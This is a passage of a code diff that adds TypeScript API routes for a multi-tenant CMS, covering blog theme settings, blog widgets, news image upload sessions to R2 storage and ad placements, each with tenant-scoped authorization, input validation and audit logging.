+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateThemeSettingsInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Theme settings are invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { mode } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const settings = await upsertBlogThemeSettings(tx, tenantId, mode);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.theme.updated",
+      resourceType: "blog_theme_settings",
+      severity: "info",
+      message: `Blog theme mode set to "${mode}".`,
+      correlationId
+    });
+
+    log("info", "blog-content.theme.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      mode
+    });
+
+    return ok(settings);
+  });
+};

--- a/src/pages/api/v1/blog/widgets/[id].ts
+++ b/src/pages/api/v1/blog/widgets/[id].ts
@@ -1,0 +1,204 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchWidgetById,
+  softDeleteWidget,
+  updateWidget
+} from "../../../../../modules/blog-content/application/widget-directory";
+import { validateDeleteReasonInput } from "../../../../../modules/blog-content/domain/content-validation";
+import { validateUpdateWidgetInput } from "../../../../../modules/blog-content/domain/widget-policy";
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "widgets",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/blog/widgets/{id}` (Issue #542). */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Widget id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateWidgetInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Widget update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const updated = await updateWidget(tx, tenantId, id, input);
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Widget not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.widget.updated",
+      resourceType: "blog_widget",
+      resourceId: id,
+      severity: "info",
+      message: `Blog widget updated: ${updated.title}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.widget.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      widgetId: id,
+      position: updated.position
+    });
+
+    return ok(updated);
+  });
+};
+
+/** `DELETE /api/v1/blog/widgets/{id}` (Issue #542) — soft-delete. `reason` required. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Widget id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateDeleteReasonInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchWidgetById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Widget not found.");
+    }
+
+    await softDeleteWidget(tx, tenantId, auth.context.tenantUserId, id, reason);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.widget.deleted",
+      resourceType: "blog_widget",
+      resourceId: id,
+      severity: "warning",
+      message: "Blog widget deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    log("info", "blog-content.widget.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      widgetId: id
+    });
+
+    return ok({ id, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/widgets/index.ts
+++ b/src/pages/api/v1/blog/widgets/index.ts
@@ -1,0 +1,156 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createWidget,
+  listWidgets
+} from "../../../../../modules/blog-content/application/widget-directory";
+import { validateCreateWidgetInput } from "../../../../../modules/blog-content/domain/widget-policy";
+import { isWidgetPosition } from "../../../../../modules/blog-content/domain/widget-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "widgets",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "widgets",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/widgets` (Issue #542) — list this tenant's non-deleted widgets, `?position=` optional filter. */
+export const GET: APIRoute = async ({ request, cookies, url }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const positionParam = url.searchParams.get("position");
+
+  if (positionParam !== null && !isWidgetPosition(positionParam)) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "position must be one of header, sidebar, footer, content_before, content_after."
+    );
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const widgets = await listWidgets(tx, tenantId, {
+      position: positionParam ?? undefined
+    });
+
+    return ok({ widgets });
+  });
+};
+
+/** `POST /api/v1/blog/widgets` (Issue #542) — create a widget. Not idempotent. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateCreateWidgetInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Widget is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const widget = await createWidget(tx, tenantId, input);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.widget.created",
+      resourceType: "blog_widget",
+      resourceId: widget.id,
+      severity: "info",
+      message: `Blog widget created: ${widget.title}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.widget.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      widgetId: widget.id,
+      position: widget.position
+    });
+
+    return ok(widget);
+  });
+};

--- a/src/pages/api/v1/media/news-images/upload-sessions/[id]/cancel.ts
+++ b/src/pages/api/v1/media/news-images/upload-sessions/[id]/cancel.ts
@@ -1,0 +1,105 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import { recordAuditEvent } from "../../../../../../../modules/logging/application/audit-log";
+import {
+  fetchNewsMediaObjectById,
+  markNewsMediaObjectFailed
+} from "../../../../../../../modules/news-portal/application/news-media-object-directory";
+
+const CANCEL_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "media",
+  action: "cancel" as const
+};
+
+/**
+ * `POST /api/v1/media/news-images/upload-sessions/{id}/cancel` (Issue
+ * #634) — aborts a still-`pending_upload` session (nothing was ever
+ * verified/attached). Not high-risk enough to require `Idempotency-Key`:
+ * it never touches R2, and a repeated call after the first naturally
+ * resolves to a clean `409` (row is no longer `pending_upload`), matching
+ * this repo's existing `verify`/`set_primary` precedent for actions
+ * excluded from `HIGH_RISK_ACTIONS` (`identity-access/domain/access-control.ts`).
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const objectId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!objectId) {
+    return fail(400, "VALIDATION_ERROR", "Upload session id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CANCEL_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const row = await fetchNewsMediaObjectById(tx, tenantId, objectId);
+
+    if (!row) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Upload session not found.");
+    }
+
+    if (row.status !== "pending_upload") {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        `Cannot cancel an upload session in status "${row.status}".`
+      );
+    }
+
+    const cancelled = await markNewsMediaObjectFailed(tx, tenantId, objectId);
+
+    if (!cancelled) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        "Upload session state changed concurrently; retry."
+      );
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "news_portal",
+      action: "news_media.object.upload_cancelled",
+      resourceType: "news_media_object",
+      resourceId: objectId,
+      severity: "info",
+      message: `News media upload session cancelled: ${row.objectKey}.`,
+      attributes: { objectKey: row.objectKey },
+      correlationId
+    });
+
+    return ok(cancelled);
+  });
+};

--- a/src/pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts
+++ b/src/pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts
@@ -1,0 +1,90 @@
+import type { APIRoute } from "astro";
+
+import { fail } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { resolveAuthInputs } from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../../../lib/security/request-body-limit";
+import { resolveNewsMediaR2Config } from "../../../../../../../modules/news-portal/domain/news-media-r2-config";
+import { validateFinalizeNewsMediaUploadSessionInput } from "../../../../../../../modules/news-portal/domain/news-media-upload-session-validation";
+import { finalizeNewsMediaUploadSession } from "../../../../../../../modules/news-portal/application/news-media-finalize-upload-session";
+
+/**
+ * `POST /api/v1/media/news-images/upload-sessions/{id}/finalize` (Issue
+ * #634) — step 5 of `r2-upload-sop.md` §2. Route only parses/validates the
+ * HTTP request and delegates to `finalizeNewsMediaUploadSession`
+ * (`application/news-media-finalize-upload-session.ts`), which performs
+ * the real R2 `GET` + magic-byte MIME sniffing + server-side SHA-256
+ * checksum this issue exists to add — see that module's own header for why
+ * `HEAD` alone (the Issue #631 security-auditor Critical finding) is never
+ * sufficient here.
+ *
+ * High-risk mutation — requires `Idempotency-Key` (skill
+ * `awcms-idempotency`) since it promotes metadata to `verified`, the
+ * status editorial content is allowed to reference.
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const objectId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!objectId) {
+    return fail(400, "VALIDATION_ERROR", "Upload session id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateFinalizeNewsMediaUploadSessionInput(
+    bodyRead.value
+  );
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Finalize request is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  return finalizeNewsMediaUploadSession(
+    {
+      tenantId,
+      objectId,
+      tokenHash: hashSessionToken(token),
+      idempotencyKey,
+      claimedChecksumSha256: validation.value.checksumSha256,
+      now: new Date(),
+      correlationId: locals.correlationId
+    },
+    {
+      sql: getDatabaseClient(),
+      config: resolveNewsMediaR2Config()
+    }
+  );
+};

--- a/src/pages/api/v1/media/news-images/upload-sessions/index.ts
+++ b/src/pages/api/v1/media/news-images/upload-sessions/index.ts
@@ -1,0 +1,169 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../../lib/security/request-body-limit";
+import {
+  resolveNewsMediaR2Config,
+  findMissingNewsMediaR2Vars
+} from "../../../../../../modules/news-portal/domain/news-media-r2-config";
+import { validateCreateNewsMediaUploadSessionInput } from "../../../../../../modules/news-portal/domain/news-media-upload-session-validation";
+import { createPendingNewsMediaObject } from "../../../../../../modules/news-portal/application/news-media-object-directory";
+import { createNewsMediaR2Client } from "../../../../../../modules/news-portal/infrastructure/news-media-r2-client";
+
+const CREATE_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "media",
+  action: "create" as const
+};
+
+type CreateTxResult =
+  | { kind: "response"; response: Response }
+  | {
+      kind: "created";
+      objectId: string;
+      objectKey: string;
+      mimeType: string;
+      createdAt: Date;
+    };
+
+/**
+ * `POST /api/v1/media/news-images/upload-sessions` (Issue #634) — step 1 of
+ * the direct-to-R2 presigned upload flow (`r2-upload-sop.md` §2). Validates
+ * shape only (no bytes exist yet), creates a `pending_upload` metadata row
+ * with a server-generated object key, then generates a short-lived
+ * presigned `PUT` URL scoped to exactly that object key. The R2 call
+ * (`presignUploadUrl` — a local signature computation, not a network round
+ * trip) happens strictly AFTER the DB transaction commits, never inside it
+ * (ADR-0006).
+ */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const config = resolveNewsMediaR2Config();
+
+  if (!config.enabled || findMissingNewsMediaR2Vars().length > 0) {
+    return fail(
+      502,
+      "PROVIDER_ERROR",
+      "News media R2 storage is not configured for this deployment."
+    );
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateCreateNewsMediaUploadSessionInput(
+    bodyRead.value,
+    config.allowedMimeTypes,
+    config.maxUploadBytes
+  );
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Upload session request is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  const txResult = await withTenant<CreateTxResult>(
+    sql,
+    tenantId,
+    async (tx) => {
+      const auth = await authorizeInTransaction(
+        tx,
+        tenantId,
+        tokenHash,
+        now,
+        CREATE_GUARD
+      );
+
+      if (!auth.allowed) {
+        return { kind: "response", response: auth.denied };
+      }
+
+      const created = await createPendingNewsMediaObject(
+        tx,
+        tenantId,
+        auth.context.tenantUserId,
+        config,
+        {
+          mimeType: input.mimeType,
+          originalFilename: input.originalFilename ?? undefined,
+          altText: input.altText ?? undefined,
+          caption: input.caption ?? undefined
+        },
+        correlationId
+      );
+
+      return {
+        kind: "created",
+        objectId: created.id,
+        objectKey: created.objectKey,
+        mimeType: created.mimeType,
+        createdAt: created.createdAt
+      };
+    }
+  );
+
+  if (txResult.kind === "response") {
+    return txResult.response;
+  }
+
+  // Outside the DB transaction (ADR-0006) — presign is local/synchronous,
+  // never a network call, but this discipline is kept uniform regardless
+  // (see news-media-r2-client.ts's own header comment).
+  const r2Client = createNewsMediaR2Client({
+    accountId: config.accountId,
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket
+  });
+
+  const presignedUrl = r2Client.presignUploadUrl({
+    objectKey: txResult.objectKey,
+    mimeType: txResult.mimeType,
+    ttlSeconds: config.presignedUploadTtlSeconds
+  });
+
+  const expiresAt = new Date(
+    txResult.createdAt.getTime() + config.presignedUploadTtlSeconds * 1000
+  );
+
+  // Never include raw R2 credentials — only the already-signed URL.
+  return ok({
+    objectId: txResult.objectId,
+    objectKey: txResult.objectKey,
+    presignedUrl,
+    expiresAt: expiresAt.toISOString()
+  });
+};

--- a/src/pages/api/v1/news-portal/ad-placements/[id].ts
+++ b/src/pages/api/v1/news-portal/ad-placements/[id].ts
@@ -1,0 +1,221 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import {
+  fetchAdPlacementById,
+  softDeleteAdPlacement,
+  updateAdPlacement
+} from "../../../../../modules/news-portal/application/ad-placement-directory";
+import { validateAdPlacementMediaReference } from "../../../../../modules/news-portal/application/ad-placement-reference-validation";
+import { validateUpdateAdPlacementInput } from "../../../../../modules/news-portal/domain/ad-placement-policy";
+import { validateDeleteReasonInput } from "../../../../../modules/blog-content/domain/content-validation";
+
+const CONFIGURE_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "ad_placements",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/news-portal/ad-placements/{id}` (Issue #638) — partial update. `placementKey` may be changed (every placement preset shares the same row shape — see `ad-placement-policy.ts`'s header comment for why this is NOT immutable like `homepage-section-policy.ts`'s `sectionType`). When `mediaObjectId` (or a `placementKey` change) is present, the media reference is re-validated against the (possibly new) target placement's allowed mime types. */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Ad placement id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(
+    request,
+    "default"
+  );
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const validation = validateUpdateAdPlacementInput(body);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Ad placement update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchAdPlacementById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Ad placement not found.");
+    }
+
+    if (input.mediaObjectId !== undefined || input.placementKey !== undefined) {
+      const referenceValidation = await validateAdPlacementMediaReference(
+        tx,
+        tenantId,
+        input.mediaObjectId ?? existing.mediaObjectId,
+        input.placementKey ?? existing.placementKey
+      );
+
+      if (!referenceValidation.valid) {
+        return fail(
+          422,
+          "AD_PLACEMENT_REFERENCE_INVALID",
+          "Ad placement references an invalid or inaccessible media object.",
+          {},
+          referenceValidation.errors
+        );
+      }
+    }
+
+    const updated = await updateAdPlacement(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      id,
+      input,
+      correlationId
+    );
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Ad placement not found.");
+    }
+
+    log("info", "news-portal.ad_placement.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "news_portal",
+      adPlacementId: id
+    });
+
+    return ok(updated);
+  });
+};
+
+/** `DELETE /api/v1/news-portal/ad-placements/{id}` (Issue #638) — soft-delete. `reason` required, same convention every other soft-deletable resource in this repo uses. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Ad placement id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateDeleteReasonInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchAdPlacementById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Ad placement not found.");
+    }
+
+    await softDeleteAdPlacement(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      id,
+      reason,
+      correlationId
+    );
+
+    log("info", "news-portal.ad_placement.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "news_portal",
+      adPlacementId: id
+    });
+
+    return ok({ id, deleted: true });
+  });
+};

--- a/src/pages/api/v1/news-portal/ad-placements/index.ts
+++ b/src/pages/api/v1/news-portal/ad-placements/index.ts
@@ -1,0 +1,166 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import {
+  createAdPlacement,
+  listAdPlacements
+} from "../../../../../modules/news-portal/application/ad-placement-directory";
+import { validateAdPlacementMediaReference } from "../../../../../modules/news-portal/application/ad-placement-reference-validation";
+import { validateCreateAdPlacementInput } from "../../../../../modules/news-portal/domain/ad-placement-policy";
+
+const READ_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "ad_placements",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "ad_placements",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/news-portal/ad-placements` (Issue #638) — list this tenant's non-deleted ad placements (admin view: includes inactive/out-of-schedule rows). */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const placements = await listAdPlacements(tx, tenantId);
+
+    return ok({ placements });
+  });
+};
+
+/**
+ * `POST /api/v1/news-portal/ad-placements` (Issue #638) — create an ad
+ * placement. `mediaObjectId` is validated for shape (domain layer) then for
+ * existence/tenant-ownership/verified-status/allowed-mime-type
+ * (`validateAdPlacementMediaReference`) before the row is written — a
+ * request that fails either never creates a partially-written row. Not
+ * idempotent (same low-risk admin-config-mutation class as
+ * `homepage-section-directory.ts`'s `createHomepageSection`/
+ * `ads-directory.ts`'s `createAd` — neither requires an Idempotency-Key).
+ */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(
+    request,
+    "default"
+  );
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const validation = validateCreateAdPlacementInput(body);
+
